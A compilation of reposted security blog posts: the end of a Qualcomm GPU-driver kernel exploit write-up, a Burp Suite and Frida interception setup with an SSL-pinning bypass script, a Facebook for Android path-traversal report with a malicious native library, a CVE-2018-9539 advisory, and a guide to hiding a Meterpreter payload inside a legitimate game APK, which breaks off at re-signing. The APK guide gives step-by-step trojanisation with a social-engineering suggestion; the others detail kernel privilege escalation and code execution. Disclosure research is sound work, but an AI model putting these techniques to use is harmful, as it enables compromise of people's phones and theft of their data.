  1. First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task had been waiting on. This will wake up the SCHED_NORMAL task and cause it to preempt the SCHED_IDLE task, and because of the task priority, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in registry, then send data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by sgl that is now cached in the registry. The main task then replaces this object by controlled data using sendmsg heap spraying. This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.


The following figure illustrates what happens in the real world.


Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing would even work on both the Galaxy A71 and Pixel 4. Even when the race failed, it does not result in a crash. It can, however, crash, if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a SWIOTLB, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that would allocate buffers with addresses greater than 32 bit. The locations of various ion heap can be seen from the kernel log during a boot, the following is from Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heap are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that does not have a fixed address. These are the heaps that have addresses higher than 32 bits. For the exploit, I’ll use the system heap.

DMA buffers allocated on the system heap is allocated via the ion_system_heap_allocate function call. It’ll first try to allocate a buffer from a preallocated memory pool. If the pool is full, then it’ll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
	return page;

and recycle the pages back to the pool after the buffer is freed.

This later case is more interesting because if the memory is allocated from the initial pool, then any out-of-bounds read/write are likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter order specifies the size of the requested memory and the allocator will return a memory block consisting of 2^order contiguous pages. In order to exploit overflow of memory allocated by the buddy allocator, (a DMA buffer from the system heap), I’ll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmallockzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th column indicates the size of the slabs in pages. So for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3=8), to use as a new slab. So by exhausting the slab, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over read/write kernel objects allocated via kmalloc and co.

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and use it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it’ll try to look for free blocks in the next order up, split it in half and add it to the freelist in the requested order. If the next order is also full, it’ll try to find space in the next higher up order, and so on. So by keep allocating pages of order 2^n, eventually the freelist will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on Pixel 4, it seems that after allocating a certain amount of DMA buffers from the ion system heap, the allocation will follow a very predicatble pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocations will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.


So by simply creating a large amount of DMA buffers in the ion system heap, the likelihood would be that the last allocated buffer will be allocated in front of a «hole» of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits in this hole.

The heap spraying strategy is then very simple. First allocate a sufficient amount of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large amount of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.

Defeating KASLR and leaking address to DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)

which is of size 560 and will persist until the /dev/binder file is closed. So it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed that a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................

The 08af 5109 80ff ffff in the second part of the first line looks like an address that corresponds to kernel code. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So looks like these are file struct of the binder files that I opened and what I’m seeing here is the field f_ops that points to the binder_fops. Moreover, the 32 bytes after f_ops are the same for every file struct of the same type, which offers a pattern to identify these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
	struct list_head	wait_list;

which is a standard doubly linked list in linux:

struct list_head {
	struct list_head *next, *prev;

When wait_list is initialized, the head of the list will just be a pointer to itself, which means that by reading the next or prev pointer of the wait_list, I can obtain the address of the file struct itself. This will then allow me to work out the address of the DMA buffer which I can control because the offset between the file struct and the buffer is known. (By looking at its offset in the data that I dumped, in this example, the offset is 0x11020).

By using the address of binder_fops, it is easy to work out the KASLR slide and defeat KASLR, and by knowing the address of a controlled DMA buffer, I can use it to store a fake file_operations («vtable» of file struct) and overwrite f_ops of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer to the file that corresponds to this file struct (which I owned), so that it now points to a fake file_operation struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I’ll use «the ultimate ROP gadget» that was used in An iOS hacker tries Android of Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

to invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This would allow us to perform arbitrary memory load/store and call arbitrary kernel functions with up to five arguments and a 64 bit return value.

There is, however one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called the Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Byapsses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much details about RKP, the two parts that are relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structure such as the credentials of a process so they are effectively read only.

Point one means that even though I can hijack the f_ops pointer of my file struct, I cannot jump to an arbitrary location. However, it is still possible to jump to the start of any function. The practical implication is that while I can control the function that I call, I may not be able to control call arguments. Point two means that the usual shortcut of overwriting credentials of my own process to that of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I’ll briefly explain later, but for the exploit of this post, I’ll just stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the file_operations, which contains a whole array of possible calls that are thin wrappers of various syscalls means that it is likely to find a file operation with a 64 bit second argument which I can control by making the appropriate syscall. In fact, I don’t even need to look that far. The first operation, llseek fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);

This function takes a 64 bit integer, loff_t as the second argument and can be invoked by calling the lseek64 syscall:

off_t lseek64(int fd, off_t offset, int whence);

where offset translates directly into loff_t in llseek. So by overwriting the f_ops pointer of my file to have its llseek field point to __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even the need to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.

As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under control and there are many ways to gain control over privileged user processes, such as those with system privilege to effectively gain system privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique mentioned in Galaxy’s Meltdown — Exploiting SVE-2020-18610 is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.


In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing the userspace services in Android, the kernel, in particular vendor drivers, remain a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to gain the full power of the kernel, which often result in a much shorter exploit bug chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Android Security Testing: Setting up burp suite with Android VM/physical device

Android Security Testing: Setting up burp suite with Android VM/physical device

Original test by Sarvesh Sharma

Setting up the Burp suite with an android device is simple but a little tricky.

There are several ways to set up this environment.
1. Setting up Burp suite with Android VM (Needs Genymotion with virtual box).
2. Setting up Burp suite with Android physical Device (Needs Rooted android device).

Setting up Burp suite with Android VM (Needs Genymotion with virtual box) or with Android physical device.

Follow the below-mentioned steps:
i. Burp suite.
ii. Genymotion (With virtual box.).


ii. Android device (Rooted.).
iii. adb tools. Click here to download.
iv. Setting up proxy and Certificate in Android VM/device.
v. Frida installed in host PC and Frida server file to run Frida from the Android device. (python installed in the host machine.(PC/laptop))

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listener → click on import/ export CA certificate. → At the export choose Certificate in DER format.(eg. cacert.der) → Click on next → select any file name having extension as .der → Click on next.

Image for post
Burp Certificate export

Step 2: Go to the folder where you saved the Burp CA certificate. → Change the extension from .der to .crt (eg. cacert.crt)→ and save it.

Step 3: Proxy setting in burp: Go to Proxy → Options → Proxy Listener → Click on add → Select specific address and then select IP of the device where burp is running or Simply select All interfaces (It will intercept traffic all the traffic going through your system.). → Enable this config.

Image for post
Burp Proxy setting

ii. Genymotion (With virtual box.).

Step 1: Installing Genymotion: Download Genymotion (Please select with the virtual box) from Click here to download. → Register with Genymotion → Login → Click on Add icon to add a new Virtual Device. → Select Android API according to Android version → select Device from the list → Click on Next. (Recommended device and settings are in the attached screenshots.)

Image for post
Genymotion Download
Image for post
VM device select
Image for post
VM device settings

Step 3: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on Open Gapps icon on side bar. Follow the steps and it will automatically download and install Gapps in your VM device.


ii. Android Physical Device.

Note: We need an android device having Android OS version 6.0 or newer. Along with this we need to root the device (there are different ways to root the device, flashing Magisk is one of the popular and recommended way to root an android device.).

Step 1: Just plug in the android device with USB cable into the system where want to capture the traffic.

iii. ADB tools. Click here to download.:

you can download ABD tools from Click hereIt will redirect to a page where you can select the ADB tools package according to your host machine. Select “sdk for winodws/mac/linux”. and then select the required terms and download. extract the tools at any location.(at this location you need to navigate in cmd/terminal when need to use ADB tools). ADB tools are useful while doing the out of the box stuff on Android, like direct installing an app in device from your laptop/pc or pushing any file directly to any location. (We will see the use of ADB in the upcoming steps.)

To globally install ADB tools: go to start in windows → search for “edit the system environment variables”. → open it → in advance tab → Environment variables → select and edit PATH in system variables → Click on New → paste the path of ADB tools directory (where you extracted, Downloaded ADB tools zip.).

iv. Setting up proxy and Certificate in Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device/Android VM from Genymotion (If it shows IP related error at bootup, then go to virtual box start the device listed there and power off after it gets an IP.) → Go to Settings → go to WIFI → Hold on Wifi name listed there and select Modify Network. → Select proxy as Manual → Input Hostname as you Host machine’s IP/Port which was used to set as proxy listener at Burp proxy setting → Save.

Image for post
Setup Proxy in android

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push burp certificate to the android device: There are two ways to add a certificate in the Android device.
i. Adding a Certificate into user-defined certificates.: (Recommanded) push burp certificate (having extension as .crt) using the command

"adb push path_to_certificate /sdcard/Download/".

Switch to android device → Go to settings → Security → install from Sdcard → Select the certificate from Download folder → it will ask to enter a name, Enter any name here (eg. Burp CA). → It will ask to add PIN security. → Enter the security Pin. → Next.

ii. Adding a Certificate into system-defined certificates.: Download and install OpenSSL form Click here. → open cmd and run command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run.
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
it will show as hash value copy it save it for further use.
then run .
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem as <hash_value>.0
Now copy the certificate tot the device. here is the list of commands to execute.
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding a burp certificate into system-defined certificates is, we don’t need to follow step V. which is Frida setup. (But it’s not a recommended way because sometimes it misses some API calls.)

V. Frida installation in host PC and running frida server from Android device.

Step 1: Installation Frida in the host PC: run command to install Frida in host pc “pip install frida-tools«.

Step 2: Running Frida from android device:

  1. run command “adb shell getprop ro.product.cpu.abi» to know the processor architecture. →
  2. download the Frida server file from Click here. (Select your file according to the processor architecture if arm than arm file and if it is x86 than select x86 file.) →
  3. extract tile xz file → copy the file which is present in the extracted folder to the android device via the command “adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/» →
  4. Now disable SELinux (This is one time process.): “adb shell» → in the shell: «su» → «setenforce 0«.
  5. Start Frida server by command: “adb shell» → «/data/local/tmp/frida-server-12.x.y-android-xyz &«

Step 3: Creating js file to do SSL pinning.: This needs to fix certificate-related errors and capture traffic in Burp suite.
create a js file named frida-ssl-pin.jsAnd paste the following content in it and save the file.

Java.perform(function() {

var array_list = Java.use(“java.util.ArrayList”);
var ApiClient = Java.use(‘’);

ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log(‘Bypassing SSL Pinning’);
var k = array_list.$new();
return k;

}, 0);

Step 4: Running the Frida receiver/client from the host machine.:

  1. Open the app in android device. now find the process name by running the command from cmd: “frida-ps -U«. and copy the process name.
  2. run Frida receiver/client by running the command: “frida -U -l path_to_js_file/frida-ssl-2.js --no-paus -f com.example.application«. This will open the app again.. and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, We need to repeat the steps of running the Frida server from the android device.
  2. In the case mentioned in point 1, we need to start the Frida receiver/client in the host machine also.

Please let me know in case of any query….

Arbitrary code execution on Facebook for Android through download feature

Original text by Sayed Abdelhafiz


Recently I discovered an ACE on Facebook for Android that can be triaged through download file from group Files Tab without open the file.


I was digging on the method that Facebook use to download files from group, I have found that Facebook use tow different mechanism to download files. If the user download the file from the post itself It will be downloaded via built-in android service called DownloadManager as far as I know It safe method to download files. If the user decide to download the file from Files Tab It will be downloaded through different method, In nutshell the application will fetch the file then will save it to Download directory without any filter.

Image for post

Notice: the selected code is the fix that Facebook pushed. The vulnerable code was without this code.

Path traversal

The vulnerability was in the second method, security measures was implemented on the server side when uploading the files but It was easy to bypass. Simply the application fetch the download file and for example save the file to /sdcard/Downloads/FILE_NAME without filter the FILE_NAME to protect against path traversal attacks. First idea came to my mind is use path traversal to overwrite native libraries which will leads to execute arbitrary code.

I have set up my burp suite proxy then Intercepted upload file request and modify the filename to ../../../sdcard/PoC then forward the request.

Image for post
Web upload endpoint

Unfortunately It wasn’t enough due of the security measures on the server side, my path traversal payload was removed. I decide to play with the payload but unfortunately no payload worked.

Image for post

Bypass security measures. (Bypass?)

After many payloads, I wasn’t able to bypass that filter. I came back to browse the application again may find something useful, It came!

Image for post

For first time, I noticed that I can upload files via Facebook mobile application. set-up burp suite proxy on my phone, enable white-hat settings on the application to bypass SSL pinning, intercepted upload file request, modify the filename to ../../../sdcard/PoC, file uploaded successfully and my payload is in the filename now!

I tried to download the file from the post, but DownloadManger service is safe as I told so the attack didn’t work. Navigated to Files Tab, download the file. And here is our attack. My file was wrote to /sdcard/PoC!

As I was able to preform path traversal, I can now overwrite the native libraries and preform ACE attack.


To exploit that attack I start new android NDK project to create native library, put my evil code on JNI_OnLoad function to make sure that the evil code will execute when loaded the library.

#include <jni.h>
#include <string>
#include <stdlib.h>JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system(“id > /data/data/com.facebook.katana/PoC”);
return JNI_VERSION_1_6;

I built the project to get my malicious library, then upload it by mobile upload endpoint and renamed it to /../../../../../data/data/com.facebook.katana/lib-xzs/

Our exploit now is ready!

PoC Video:


April 29, 2020 at 5:57 AM: Subbmited the report to facebook.
April 29, 2020 at 11:20 AM: Facebook were able to reproduce it.
April 29, 2020 at 12:17 PM: Traiged.
June 16, 2020 at 12:54 PM: Vulnerability has been fixed.
July 15, 2020 at 5:11 PM: Facebook rewarded me $10,000!


I noticed people commented on the amount of bounty when I tweet about the bug, It small? I was shocked and objected to it and tried to discuss Facebook, but noway they say that amount is fair and they won’t revisiting this decision. As Neal told me: Spencer provided you with insight into how we determined the bounty for this issue. We believe the amount awarded is reasonable and will not be revisiting this decision.

It’s up to you to decide before you report your vulnerabilities! Vendor or?

Have a nice day!

CVE-2018-9539: Use-after-free vulnerability in privileged Android service

( Original text by Tamir Zahavi-Brunner )

As part of our platform research in Zimperium zLabs, I have recently discovered a vulnerability in a privileged Android service called MediaCasService and reported it to Google. Google designated it as CVE-2018-9539 and patched it in the November security update (2018-11-01 patch level).

In this blog post, I will describe the technical details of this use-after-free vulnerability, along with some background information and the details of the proof-of-concept I wrote that triggers it. Link to the full proof-of-concept is available at the end of the blog post.


The Android service called MediaCasService (AKA android.hardware.cas) allows apps to descramble protected media streams. The communication between apps and MediaCasService is performed mostly through two interfaces/objects: Cas, which manages the keys (reference: MediaCas Java API), and Descrambler, which performs the actual descramble operation (reference: MediaDescrambler Java API).

Underneath the MediaCasService API, the actual operations are performed by a plugin, which is a library that the service loads. In our case, the relevant plugin is the ClearKey plugin, whose library is

In order to descramble data, apps need to use both the Cas object and the Descrambler object. The Descrambler object is used for the actual descramble operation, but in order to do that, it needs to be linked to a session with a key. In order to manage sessions and add keys to them, the Cas object is used.

Internally, the ClearKey plugin manages sessions in the ClearKeySessionLibrary, which is essentially a hash table. The keys are session IDs, while the values are the session objects themselves. Apps receive the session IDs which they can use to refer to the session objects in the service.

After creating a session and attaching a key to it, apps are in charge of linking it to a Descrambler object. The descrambler object has a member called mCASSession, which is a reference to its session object and is used in descramble operations. While there is no obligation to do so, once a Descrambler session is linked with a session object, an app can remove that session from the session library. In that case, the only reference to the session object will be through the Descrambler’s mCASSession.

An important note is that references to session objects are held through strong pointers (sp class). Hence, each session object has a reference count, and once that reference count reaches zero the session object is released. References are either through the session library or through a Descrambler’s mCASSession.

The vulnerability

Let’s take a look at ClearKey’s descramble method:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)


As you can see, the session object referenced by mCASSession is used here in order to decrypt, but its reference count does not increase while it is being used. This means that it is possible for the decrypt function to run with a session object which was released, as its reference count was decreased to zero.

This allows an attacker to cause a use-after-free (the session object will be used after it was freed) through a race condition. Before running descramble, the attacker would remove the reference to the session object from the session library, leaving the Descrambler’s mCASSession as the only reference to the session. Then, the attacker would run descramble at the same time as setting the session of the Descrambler to another session, which can cause a race condition. Setting a different session for the Descrambler would release the original session object (its reference count would drop to zero); if this happens in the middle of mCASSession->decrypt, then decrypt would be using a freed session object.

Proof of concept

Before going into the details of the PoC, there is one note about its effect.

In this PoC, nothing gets allocated instead of the released session object; we just let the decrypt function use a freed object. One of the members of the session object that decrypt uses is a mKeyLock, which is essentially a mutex that decrypt attempts to lock:

Snippet from frameworks/av/drm/mediacas/plugins/clearkey/ClearKeyCasPlugin.cpp (source)


As you can expect, when a session object is released, the mutex of its mKeyLock is destroyed. Therefore, when the use-after-free is triggered, decrypt attempts to use an already destroyed mutex.

Interestingly, this is where a recent change comes into place. Up until Android 8.1, attempting to use a destroyed mutex would return an error, which in this case would simply be ignored. Since Android 9, attempting to use a destroyed mutex results in an abort, which crashes the process:

Snippet from bionic/libc/bionic/pthread_mutex.cpp (source)


This means that while the PoC should always cause a use-after-free, only Android 9 has a way to detect whether it worked or not. In older versions, there is no noticeable effect. Therefore, the PoC is mainly intended to run on Android 9.

After covering the effect of the PoC, here is a high-level overview of the actions it performs:

  1. Initialize Cas and Descrambler objects.
  2. Use the Cas object in order to create two sessions: session1 and session2. Both of them will be referenced from the session library.
  3. Link session1 to the Descrambler object, and then use the Cas object in order to remove it from the session library. Now, session1 only has a reference from the Descrambler object; its reference count is one.
  4. At the same time:
    • Run multiple threads which perform descramble through the Descrambler object.
    • Set the session of the Descrambler object to session2.
  5. If running descramble in one of the threads did not return, it means that the PoC was successful and the service crashed. If not, retry again from step 2.

Full source code for the PoC is available on GitHub .


  • 08.2018 – Vulnerability discovered
  • 08.2018 – Vulnerability details + PoC sent to Google
  • 11.2018 – Google distributed patches

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).


Embedding Meterpreter in Android APK

( Original text by Joff Thyer )

Mobile is everywhere these days. So many applications in our daily life are being migrated towards a cloud deployment whereby the front end technology is back to the days of thin clients. As the pendulum swings yet again, our thin client can be anything from a JavaScript browser framework to a mobile enabled frontend such as Objective-C on Apple iOS, or Java based on Android.

Looking at malware, our friends at Apple continue to maintain the 5-guys in a cave paradigm of attempting to vet all apps that enter the iOS app store. While it is a noble effort, there are still instances where malware creeps through the door. Unlike Apple, the Android marketplace is an open approach that allows anyone to contribute to the play store, and moreover represents a majority of the mobile market share. In addition, there are various third party sites that allow direct download of Android applications package files (APK’s).

The Metasploit project allows a pentester to generate Android payloads with a pretty highly functional meterpreter command channel that can be loaded onto an Android device. Typically, loading this APK will be through the Android debugger “adb” through side loading. From a pen tester perspective, something that is fun to do is to combine a legitimate (perhaps fun) app with Meterpreter, and side load that app onto an Android device. Naturally, you would probably consider sending that device to a “friend” as a gift or some similar social engineering ruse.

Android applications are written in Java which compiles down to a Dalvik executable format known as DEX. The compiled version of an application is a ZIP file of DEX bytecode files. The Dalvik virtual machine on Android has been more recently replaced with Android RunTime (ART) which performs additional optimization and compiles the DEX bytecode into native assembly code. The Dalvik VM primarily performs Just In Time (JIT) interpretation of the majority of bytecode. ART is higher performing than the Dalvik virtual machine which only optimized portions of the bytecode for frequently executed parts of the app.

Smali/baksmali is an assembler/disassembler for Android DEX bytecode. An Android tool named “apktool” enables the disassembling of zipped DEX (APK files) into smali files, and reassembling of smali files back to DEX and subsequently to the zipped APK format. We can use this tool to disassemble, and modify an existing APK file. In this context, we can use the tool to disassemble, and add a additional static entry point into the smali code of the initial Android Activity to kick off our Meterpreter.

Overall the steps to embed a Meterpreter into an existing APK file are as follows:

  1. Find an existing fun APK application on “” or similar mirror site.
  2. Generate the Metasploit APK file.
  3. Disassemble with “apktool” both the Metasploit APK file, and the APK file we are intending to modify.
  4. Copy all of the Meterpreter smali code over to the new APK smali directory.
  5. Find the entrypoint of the code within the APK application’s AndroidManifest.xml file by looking for the intent-filter with the line:
    <action android:name="android.intent.action.MAIN"/>

    The activity name that encloses this intent-filter will be the entrypoint you are seeking.

  6. Modify the activity “.smali” file to include a line that starts up the Meterpreter stage.
  7. Copy all of the Meterpreter permissions from the Meterpreter AndroidManifest.xml into the modified APK’s AndroidManifest.xml.
  8. Re-assemble into DEX zipped format.
  9. Sign the newly created APK file with “jarsigner”, and then side load onto your target Android device.

It is much easier to understand the above steps with a concrete example. To illustrate this, I downloaded an APK file of a game called Cowboy Shooting Game from


Generate Your Malware APK

I then generated a Metasploit APK using the “msfvenom” command as follows.

Generate Your Malware APK

I then generated a Metasploit APK using the “msfvenom” command as follows.

Disassemble the APK Files

Both files were then disassembled (baksmaling!!!) using the “apktool” as follows:



Copy the Malware Code Into the Cowboy Tools Game

An easy way to do this is to change directory into the Metasploit APK directory, then copy all of the files under the “smali” directory into the “com.CowboyShootingGames_2018-09-22” directory. An old trick I learned from a systems administrator to backup entire directory trees using the “tar” command comes in handy whereby you pipe the output of tar into a second command which changes directory and “untars” the resulting files.


Find the Activity EntryPoint

Below we can see that the entry activity is listed as “com.CowboyShootingGames.MainActivity”. We know this because the XML contains an intent-filter with “android.intent.action.MAIN” within it.


Modify the Activity EntryPoint Smali File

As can be seen above, in this case the file is going to be named “MainActivity.smali”, and will be located in the “com/CowboyShootingGames” directory as per the periods (“.”) in the fully qualified class path.


Within the “MainActivity.smali” file, we are looking for the “onCreate()” method.

We need to add a single line of “smali” code right below the “onCreate()” method call to invoke our Meterpreter stage.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Please note that the above is a single line of code. It is possible to obfuscate by using a different pathname than “com/metasploit/stage/Payload” however if you do that you will have to modifiy all references to the path in all of the “smali” files that are contained in the “Payload” directory, and change the directory name itself. This can be done manually but is prone to error. Continuing without any obfuscation for a moment, the final result after modification will look like the below screenshot.



Add Permissions to the Modified APK “AndroidManifest.xml” File

For the next step, use “grep” to search for all of the lines in the Metasploit “AndroidManfest.xml” file that contain the strings “uses-permission”, and “uses-feature” into the modified APK’s AndroidManiest.xml file.


You will need to use an editor to insert the permissions at the appropriate place in the new “AndroidManifest.xml” file. Search for an existing “use-permission” line as your guideline of where to insert the text.


You might end up with some duplicate permissions. You can optionally remove them but it really does not matter.

Build the New APK Package File

Now use the “apktool” again to re-assemble the resulting APK package file. The end result will be written into a “dist” directory within the APK directory itself.


Re-Sign the Resulting Package File

